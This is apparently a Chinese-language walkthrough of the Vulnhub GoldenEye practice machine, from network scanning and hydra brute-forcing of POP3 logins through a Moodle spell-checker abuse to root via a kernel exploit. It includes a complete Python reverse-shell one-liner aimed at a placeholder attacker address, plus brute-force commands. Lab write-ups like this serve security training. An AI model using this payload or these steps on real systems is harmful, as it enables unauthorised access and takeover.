OSCP-Vulnhub靶机记录-GoldenEye-walkthrough

靶机地址

https://www.vulnhub.com/entry/goldeneye-1,240/
 

深入交流学习：webMsec

安装靶机

主机发现

sudo arp-scan -l

192.168.52.136

信息收集

nmap -sS -sV -T5 -A -p- 192.168.52.136

运行了邮件服务，先看看80端口

访问/sev

-home/需要账户密码

查看源码发现js文件terminal.js

在注释当中发现两个用户：boris和Natalya

注释中还给出了HTML编码之后的password，base64解码后为：InvincibleHack3r

使用获得的用户名和密码，尝试登录http://192.168.52.136/sev-home/

访问55006和55007，确定是55007

接下来，用hydra爆破pop3

hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.52.136 -s 55007 pop3

boris和natalya的pop3密码都爆破出来

接下来，nc登录pop3，看看有什么邮件

用户名：xenia，密码：RCP90rulez!

域：http://severnaya-station.com

网址：http://severnaya-station.com/gnocertdir

根据邮箱的要求，修改hosts文件，添加域名，然后访问

使用刚才的账号密码登录，moodle的开源cms

发现一封邮件，找到用户名doak

继续hydra爆破得到密码goat

并登录pop3

用户名：dr_doak，密码：4England!

重新登录CMS，发现一个s3cret.txt文件。

下载下来，使用exiftool查看

base64解密一下得到xWinter1995x!

admin/ xWinter1995x!登录moodleCMS

Plugins-Text editors-TinyMCE，Spell engine选项修改为PSpellShell

然后添加python-reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.connect(("attackip",port));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

触发shell,nc开启监听

提升交互式shell,并查看内核版本

uname -a

因为靶机没有gcc,改一下，改成cc

然后建立一个简单的httpserver,把exp传过去

然后在靶机用wget下载

编译cc，并执行

执行成功，id,root到手